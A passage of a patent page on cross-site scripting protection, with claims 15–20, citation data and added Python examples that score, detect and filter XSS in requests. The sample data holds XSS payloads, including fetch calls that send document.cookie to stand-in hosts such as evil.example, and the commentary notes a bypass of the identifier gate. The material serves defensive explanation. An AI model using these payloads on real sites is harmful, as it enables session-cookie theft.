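The scoring and tiered response of claims 11 to 14, worked through as an added example; this is not the patent's own code, and the historical records, the attack-capable character set, the weight coefficient α, the three levels, the concrete meaning of "mask", "replace" and "delete", and the padding character are all assumptions chosen for illustration. The one reading choice worth flagging: m is counted as the number of historical script codes in which a character occurs (rather than every repetition within a record), so that m/M stays a genuine percentage as claim 12 calls it.

```python
"""
Added example (not the patent's own code) for claims 11 to 14: character
probability from historical attack records, P = alpha * m / M, mapped onto three
probability levels that select mask, replace or delete, with the claim 14 exception
for required code.

Assumptions, mine rather than the claims':
  * one historical record is one captured request that contained a confirmed XSS
    payload and contributes one cross-site access script code, so M = len(records);
  * m counts the historical script codes in which the character occurs, so that
    m / M is a genuine percentage as claim 12 calls it;
  * the attack-capable character set, alpha and the three levels are operator
    settings; the values here are illustrative;
  * "mask" strips the attack-capable characters, "replace" entity-encodes them,
    "delete" drops the whole script code, and the claim 14 safe padding character
    is an underscore.
"""

ATTACK_CHARS = set('<>"\'()=;/`')          # assumption: common XSS metacharacters
ALPHA = 0.8                                # weight coefficient alpha (illustrative)
LEVELS = (0.15, 0.30, 0.60)                # first, second, third probability level
PAD_CHAR = '_'                             # claim 14 safe character (assumption)
ENTITY = {'<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
          '`': '&#x60;', '(': '&#40;', ')': '&#41;', '=': '&#61;', ';': '&#59;'}

# Constructed historical records of requests that carried XSS (sample data).
HISTORICAL_RECORDS = [
    '<script>alert(1)</script>',
    '<img src=x onerror="alert(document.cookie)">',
    '"><svg onload=alert(1)>',
    "javascript:alert('x')",
    '<a href="javascript:fetch(`//evil/?c=`+document.cookie)">x</a>',
]


def char_probability(char, records=HISTORICAL_RECORDS, alpha=ALPHA):
    """Claim 12: P = alpha * m / M."""
    m = sum(1 for record in records if char in record)   # occurrences (see assumptions)
    big_m = len(records)                                  # total script codes M
    return alpha * m / big_m


def attack_chars(script_code):
    """Distinct attack-capable characters present, in order of first appearance."""
    return list(dict.fromkeys(ch for ch in script_code if ch in ATTACK_CHARS))


def score(script_code):
    """Character probability of a script code: the highest P among its
    attack-capable characters (assumption: the worst character decides)."""
    return max((char_probability(ch) for ch in attack_chars(script_code)), default=0.0)


def tier(prob, levels=LEVELS):
    """Claim 13: 0 = below the first level, 1 = mask, 2 = replace, 3 = delete."""
    first, second, third = levels
    if prob > third:
        return 3
    if prob > second:
        return 2
    if prob > first:
        return 1
    return 0


def defend(script_code, required=False):
    """Apply the tiered defense to one script code. `required` is the outcome of the
    claim 14 functional evaluation, supplied by the caller. Returns (action, code);
    code is None when the script code is deleted from the request."""
    dangerous = set(attack_chars(script_code))
    level = tier(score(script_code))
    if level == 0:
        return 'allow', script_code
    if level == 1:
        return 'mask', ''.join(ch for ch in script_code if ch not in dangerous)
    if level == 2:
        return 'replace', ''.join(ENTITY[ch] if ch in dangerous else ch for ch in script_code)
    if required:
        return 'pad', ''.join(PAD_CHAR if ch in dangerous else ch for ch in script_code)
    return 'delete', None


if __name__ == '__main__':
    for code in ('hello world', 'alert`1`', 'a=1;b=2', '<script>alert(1)</script>'):
        print(repr(code), round(score(code), 2), defend(code))
    print(defend('<script>alert(1)</script>', required=True))
```

With the sample records, `(` and `)` occur in every record and so score P = 0.8, which is what pushes `<script>alert(1)</script>` into the delete tier; the claim 14 path keeps that same code at its original length as `_script_alert_1___script_`. Note that P depends entirely on the corpus: a character that never appeared in a past attack (here `;`) scores 0 regardless of how it is used, which is the caveat to keep in mind with any frequency-based filter.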
  15. A cross-site attack protection device, comprising a memory, a processor, and a cross-site attack protection program stored in the memory and executable on the processor, wherein the cross-site attack protection program, when executed by the processor, implements the following steps of a cross-site attack protection method:
    acquiring an external network access request received on the network side, the external network access request being a set containing at least one cross-site access script code for performing cross-site data access;
    detecting, according to predefined lexical combination rules, whether a malicious program is present in the HTTP packet used to respond to cross-site access within the cross-site access script code carried by the external network access request, the lexical combination rules being a model obtained by analysing currently known malicious attack programs;
    if a malicious program is detected, detecting whether an access identifier is present in the cross-site access script code, the access identifier being defined on the basis of preset user rules;
    if the access identifier is present, determining whether the cross-site access script code contains characters having attack capability;
    if the cross-site access script code contains such characters, filtering out the characters having attack capability from the cross-site access script code according to the access identifier, and performing cross-site scripting defense processing on the cross-site access script code.
  16. The cross-site attack protection device according to claim 15, wherein, when the cross-site attack protection program is executed by the processor to implement the step of detecting, according to the predefined lexical combination rules, whether a malicious program is present in the HTTP packet used to respond to cross-site access within the cross-site access script code carried by the external network access request, the following steps are further performed:
    executing the cross-site access script code in a simulated run, and capturing the active tags on each accessed page of the HTTP packet during the run;
    calculating the reciprocal of the tag probability of each active tag in the cross-site access script code, summing the reciprocals and taking their arithmetic mean as the embedded-JavaScript reasonableness index of the active tags;
    classifying the cross-site access script code according to the reasonableness index;
    wherein an active tag is a tag between which and the cross-site access script code no other active tag lies, and the tag probability is the probability that the cross-site access script code appears directly within the active tag.
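The active-tag capture and reasonableness index of claim 16, as an added example rather than the patent's own code. The claim specifies a simulated run; this example parses the page statically with Python's html.parser instead, which is an assumption and a real limitation (scripts inserted by DOM manipulation at run time are never seen). Also assumed: the active tag of a script is its innermost open ancestor element, the tag probability of a tag is estimated from a constructed reference corpus of benign pages as the fraction of that tag's occurrences that directly contain a script, an unseen tag gets a floor probability so its reciprocal stays finite, and the classification threshold is arbitrary.

```python
"""
Added example (not the patent's own code) for claim 16: capture the "active tag"
of every script on a page and derive the embedded-JavaScript reasonableness index.

Assumptions, all mine rather than the claim's:
  * the page is parsed statically with html.parser instead of being executed in a
    simulated browser run, so scripts injected by DOM manipulation are not seen;
  * the active tag of a script is its innermost open ancestor element;
  * the tag probability of tag T is estimated from a reference corpus of benign
    pages as (occurrences of T directly containing a script) / (occurrences of T);
  * a tag never seen directly containing a script gets a floor probability so
    that its reciprocal stays finite; the classification threshold is arbitrary.
"""
from collections import Counter
from html.parser import HTMLParser

# Elements that never have a closing tag and must not stay on the open-element stack.
VOID_ELEMENTS = {'area', 'base', 'br', 'col', 'embed', 'hr', 'img', 'input',
                 'link', 'meta', 'param', 'source', 'track', 'wbr'}
PROBABILITY_FLOOR = 0.01   # assumption
SUSPICIOUS_INDEX = 10.0    # assumption: an index above this is classified as suspicious


class ActiveTagCapture(HTMLParser):
    """Records the innermost open element enclosing each <script> (its active tag)
    and counts every tag seen, using a stack of currently open elements."""

    def __init__(self):
        super().__init__()
        self.stack = []
        self.active = []            # active tag of each script, in document order
        self.tag_count = Counter()

    def handle_starttag(self, tag, attrs):
        self.tag_count[tag] += 1
        if tag == 'script':
            self.active.append(self.stack[-1] if self.stack else '#document')
        if tag not in VOID_ELEMENTS:
            self.stack.append(tag)

    def handle_endtag(self, tag):
        # Pop back to the matching open element; unclosed inner tags are discarded,
        # the way a browser implicitly closes them.
        if tag in self.stack:
            while self.stack.pop() != tag:
                pass


def capture(page):
    parser = ActiveTagCapture()
    parser.feed(page)
    parser.close()
    return parser


def active_tags(page):
    return capture(page).active


def tag_probabilities(reference_pages):
    """Per tag name, the probability that an occurrence of the tag directly contains
    a script, estimated over the reference corpus. '#document' counts once per page."""
    direct, total = Counter(), Counter()
    for page in reference_pages:
        parsed = capture(page)
        direct.update(parsed.active)
        total.update(parsed.tag_count)
        total['#document'] += 1
    return {tag: direct[tag] / total[tag] for tag in total}


def reasonableness_index(page, probs, floor=PROBABILITY_FLOOR):
    """Arithmetic mean of the reciprocal tag probabilities of the page's active tags.
    Scripts sitting in tags that rarely hold scripts push the index up."""
    tags = active_tags(page)
    if not tags:
        return 0.0
    reciprocals = [1.0 / max(probs.get(tag, 0.0), floor) for tag in tags]
    return sum(reciprocals) / len(reciprocals)


def classify(index, threshold=SUSPICIOUS_INDEX):
    return 'suspicious' if index > threshold else 'normal'


# Constructed reference corpus of benign pages (sample data, not real traffic).
REFERENCE_PAGES = [
    '<html><head><script src="a.js"></script></head><body><div><p>hi</p></div></body></html>',
    '<html><head><meta charset="utf-8"><script>init()</script></head>'
    '<body><div>x</div><div>y</div></body></html>',
    '<html><body><div>a</div><script>track()</script></body></html>',
    '<html><head></head><body><p>z</p><div><script>w()</script></div></body></html>',
]
# Constructed pages under inspection.
BENIGN_PAGE = ('<html><head><script>a()</script></head>'
               '<body><div><script>b()</script></div></body></html>')
SUSPICIOUS_PAGE = ('<html><body><table><tr><td>Name</td><td><img src=x>'
                   '<script>fetch("//evil.example/?c=" + document.cookie)</script>'
                   '</td></tr></table></body></html>')

if __name__ == '__main__':
    probs = tag_probabilities(REFERENCE_PAGES)
    for name, page in (('benign', BENIGN_PAGE), ('suspicious', SUSPICIOUS_PAGE)):
        index = reasonableness_index(page, probs)
        print(name, active_tags(page), round(index, 2), classify(index))
```

On the sample corpus `head` directly holds a script in two of three occurrences and `div` in one of five, so the benign page scores (1.5 + 5)/2 = 3.25, while a script whose active tag is a `td` (never seen holding a script in the corpus) hits the floor and scores 100. The index is only as good as the reference corpus: a site that routinely inlines scripts in table cells needs its own baseline, otherwise every such page is flagged.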
  17. The cross-site attack protection device according to claim 16, wherein, when the cross-site attack protection program is executed by the processor to implement the step of filtering out the characters having attack capability from the cross-site access script code according to the access identifier and performing cross-site scripting defense processing on the cross-site access script code, the following steps are further performed:
    extracting the characters having attack capability from the cross-site access script code;
    calculating the character probability of those characters appearing in the external network access request;
    comparing the character probability with a preset probability level for information leakage;
    if the character probability is greater than the probability level, starting an access protection program to perform cross-site scripting defense processing on the access request.
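The decision pipeline of claims 15 and 17 run end to end over a constructed request, as an added example that is not the patent's own code. Assumptions: a candidate script code is every decoded query-string or form-body value; the lexical combination rules are illustrative regular expressions standing in for the model the claims derive from known attack programs; the access identifier is a user rule matching cookie or storage access or a `//host` reference; the in-request character probability of claim 17 is the share of attack-capable characters in the script code; and the leak level is 0.10.

```python
"""
Added example (not the patent's own code) for the gated pipeline of claims 15 and
17: script codes are pulled out of an external network access request, screened by
lexical combination rules, gated on an access identifier, searched for attack-capable
characters, and finally compared against the information-leak probability level.

Assumptions, mine rather than the claims':
  * a script code candidate is every decoded query-string or form-body value;
  * the lexical combination rules are regular expressions distilled from known
    payload shapes; a real deployment would derive them from its own attack corpus;
  * the access identifier is a user rule matching cookie/storage access or a
    //host reference (a marker of cross-site data access);
  * the in-request character probability of claim 17 is the share of
    attack-capable characters in the script code, and the leak level is 0.10.
"""
import re
from urllib.parse import parse_qsl, urlsplit

LEXICAL_RULES = [re.compile(p, re.I) for p in (
    r'<\s*script\b',
    r'<\s*(?:img|svg|iframe|object|embed)\b[^>]*\bon\w+\s*=',
    r'\bon(?:error|load|click|mouseover|focus)\s*=',
    r'javascript\s*:',
    r'\b(?:eval|setTimeout|Function)\s*\(',
)]
ACCESS_IDENTIFIER = re.compile(r'document\.cookie|localStorage|sessionStorage|//[\w.-]+', re.I)
ATTACK_CHARS = set('<>"\'()=;/`')
LEAK_LEVEL = 0.10


def script_codes_from_request(raw):
    """Claim 15 step 1: the request as the set of its candidate script codes."""
    head, _, body = raw.partition('\r\n\r\n')
    target = head.split('\r\n', 1)[0].split(' ')[1]        # request-target of the request line
    values = [v for _, v in parse_qsl(urlsplit(target).query, keep_blank_values=True)]
    if body:
        values += [v for _, v in parse_qsl(body, keep_blank_values=True)]
    return values


def matched_rules(code):
    return [rule.pattern for rule in LEXICAL_RULES if rule.search(code)]


def has_access_identifier(code):
    return ACCESS_IDENTIFIER.search(code) is not None


def attack_chars(code):
    return [ch for ch in code if ch in ATTACK_CHARS]


def request_char_probability(code):
    return len(attack_chars(code)) / len(code) if code else 0.0


def inspect(code):
    """Walk the gates of claim 15 in order; report the gate that decided."""
    rules = matched_rules(code)
    if not rules:                                   # no malicious program detected
        return {'stage': 'lexical', 'action': 'allow'}
    if not has_access_identifier(code):             # malicious shape, but no access identifier
        return {'stage': 'identifier', 'action': 'allow', 'rules': rules}
    chars = attack_chars(code)
    if not chars:
        return {'stage': 'chars', 'action': 'allow', 'rules': rules}
    p = request_char_probability(code)              # claim 17 comparison
    return {'stage': 'probability', 'action': 'defend' if p > LEAK_LEVEL else 'allow',
            'rules': rules, 'chars': sorted(set(chars)), 'p': round(p, 3)}


def inspect_request(raw):
    return [inspect(code) for code in script_codes_from_request(raw)]


# Constructed request (sample data): a reflected payload in the query string and a
# second payload plus a benign value in the form body.
RAW_REQUEST = (
    'POST /search?q=%3Cscript%3Efetch%28%22//evil.example/%3Fc%3D%22'
    '%2Bdocument.cookie%29%3C/script%3E HTTP/1.1\r\n'
    'Host: shop.example\r\n'
    'Content-Type: application/x-www-form-urlencoded\r\n'
    '\r\n'
    'comment=hello+world&sig=%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E'
)

if __name__ == '__main__':
    for code, verdict in zip(script_codes_from_request(RAW_REQUEST), inspect_request(RAW_REQUEST)):
        print(repr(code), verdict)
```

The `q` value matches a lexical rule, carries both `document.cookie` and a `//evil.example` reference, and has 13 attack-capable characters in 60, so it reaches the final gate and is sent to defense. The `sig` value (`<img src=x onerror=alert(1)>`) shows the cost of the ordering the claims prescribe: it matches two lexical rules but carries no access identifier, so this pipeline lets it through. Any deployment of this scheme needs its access-identifier rules to cover every way a payload can reach site data, or the identifier gate becomes a bypass.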
  18. A computer-readable storage medium storing a cross-site attack protection program, wherein the cross-site attack protection program, when executed by a processor, implements the following steps of a cross-site attack protection method:
    acquiring an external network access request received on the network side, the external network access request being a set containing at least one cross-site access script code for performing cross-site data access;
    detecting, according to predefined lexical combination rules, whether a malicious program is present in the HTTP packet used to respond to cross-site access within the cross-site access script code carried by the external network access request, the lexical combination rules being a model obtained by analysing currently known malicious attack programs;
    if a malicious program is detected, detecting whether an access identifier is present in the cross-site access script code, the access identifier being defined on the basis of preset user rules;
    if the access identifier is present, determining whether the cross-site access script code contains characters having attack capability;
    if the cross-site access script code contains such characters, filtering out the characters having attack capability from the cross-site access script code according to the access identifier, and performing cross-site scripting defense processing on the cross-site access script code.
  19. The computer-readable storage medium according to claim 18, wherein, when the cross-site attack protection program is executed by the processor to implement the step of detecting, according to the predefined lexical combination rules, whether a malicious program is present in the HTTP packet used to respond to cross-site access within the cross-site access script code carried by the external network access request, the following steps are further performed:
    executing the cross-site access script code in a simulated run, and capturing the active tags on each accessed page of the HTTP packet during the run;
    calculating the reciprocal of the tag probability of each active tag in the cross-site access script code, summing the reciprocals and taking their arithmetic mean as the embedded-JavaScript reasonableness index of the active tags;
    classifying the cross-site access script code according to the reasonableness index;
    wherein an active tag is a tag between which and the cross-site access script code no other active tag lies, and the tag probability is the probability that the cross-site access script code appears directly within the active tag.
  20. The computer-readable storage medium according to claim 19, wherein, when the cross-site attack protection program is executed by the processor to implement the step of filtering out the characters having attack capability from the cross-site access script code according to the access identifier and performing cross-site scripting defense processing on the cross-site access script code, the following steps are further performed:
    extracting the characters having attack capability from the cross-site access script code;
    calculating the character probability of those characters appearing in the external network access request;
    comparing the character probability with a preset probability level for information leakage;
    if the character probability is greater than the probability level, starting an access protection program to perform cross-site scripting defense processing on the access request.
PCT/CN2019/119113 2019-08-01 2019-11-18 Cross-site scripting attack protection method and apparatus, device and storage medium WO2021017318A1 (en)

Applications Claiming Priority (2)

Application Number Priority Date Filing Date Title
CN201910706703.9 2019-08-01
CN201910706703.9A CN110650117B (en) 2019-08-01 2019-08-01 Cross-site attack protection method, device, equipment and storage medium

Publications (1)

Publication Number Publication Date
WO2021017318A1 true WO2021017318A1 (en) 2021-02-04

Family

ID=68989850

Family Applications (1)

Application Number Title Priority Date Filing Date
PCT/CN2019/119113 WO2021017318A1 (en) 2019-08-01 2019-11-18 Cross-site scripting attack protection method and apparatus, device and storage medium

Country Status (2)

Country Link
CN (1) CN110650117B (en)
WO (1) WO2021017318A1 (en)

Cited By (3)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN113329026A (en) * 2021-06-08 2021-08-31 中国传媒大学 Attack capability determination method and system based on network target range vulnerability drilling
CN114257522A (en) * 2021-12-21 2022-03-29 浙江国利网安科技有限公司 Network security attack and defense demonstration system, method, device and storage medium
CN115617879A (en) * 2022-11-23 2023-01-17 中国电子信息产业集团有限公司 Data source management method of data element and corresponding system

Families Citing this family (4)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN111259398B (en) * 2020-02-25 2022-11-22 深信服科技股份有限公司 Virus defense method, device, equipment and readable storage medium
CN112671741B (en) * 2020-12-16 2022-10-18 平安普惠企业管理有限公司 Network protection method, device, terminal and storage medium
CN113065132B (en) * 2021-03-25 2023-11-03 深信服科技股份有限公司 Method and device for detecting confusion of macro program, electronic equipment and storage medium
CN113810418B (en) * 2021-09-18 2023-12-26 土巴兔集团股份有限公司 Method for defending cross-site scripting attack and related equipment thereof

Citations (5)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN101901221A (en) * 2009-05-27 2010-12-01 北京启明星辰信息技术股份有限公司 Method and device for detecting cross site scripting
US20120023395A1 (en) * 2010-07-22 2012-01-26 International Business Machines Corporation Method and apparatus for dynamic content marking to facilitate context-aware output escaping
CN102833269A (en) * 2012-09-18 2012-12-19 苏州山石网络有限公司 Detection method and device for cross site scripting and firewall with device
CN104601540A (en) * 2014-12-05 2015-05-06 华为技术有限公司 Cross-site scripting (XSS) attack defense method and Web server
CN106354632A (en) * 2016-08-24 2017-01-25 北京奇虎测腾科技有限公司 Source code detecting system and method based on static analysis technology

Family Cites Families (6)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US8024804B2 (en) * 2006-03-08 2011-09-20 Imperva, Inc. Correlation engine for detecting network attacks and detection method
US8578482B1 (en) * 2008-01-11 2013-11-05 Trend Micro Inc. Cross-site script detection and prevention
CN104519008B (en) * 2013-09-26 2018-05-15 北大方正集团有限公司 Cross-site scripting attack defence method and device, application server
CN106506548A (en) * 2016-12-23 2017-03-15 努比亚技术有限公司 The defence installation of cross-site scripting attack and method
CN109040097A (en) * 2018-08-23 2018-12-18 彩讯科技股份有限公司 A kind of defence method of cross-site scripting attack, device, equipment and storage medium
CN109257393A (en) * 2018-12-05 2019-01-22 四川长虹电器股份有限公司 XSS attack defence method and device based on machine learning

Also Published As

Publication number Publication date
CN110650117B (en) 2022-03-25
CN110650117A (en) 2020-01-03

Legal Events

Date Code Title Description
121 Ep: the epo has been informed by wipo that ep was designated in this application (Ref document number: 19939825; Country of ref document: EP; Kind code of ref document: A1)
NENP Non-entry into the national phase (Ref country code: DE)
122 Ep: pct application non-entry in european phase (Ref document number: 19939825; Country of ref document: EP; Kind code of ref document: A1)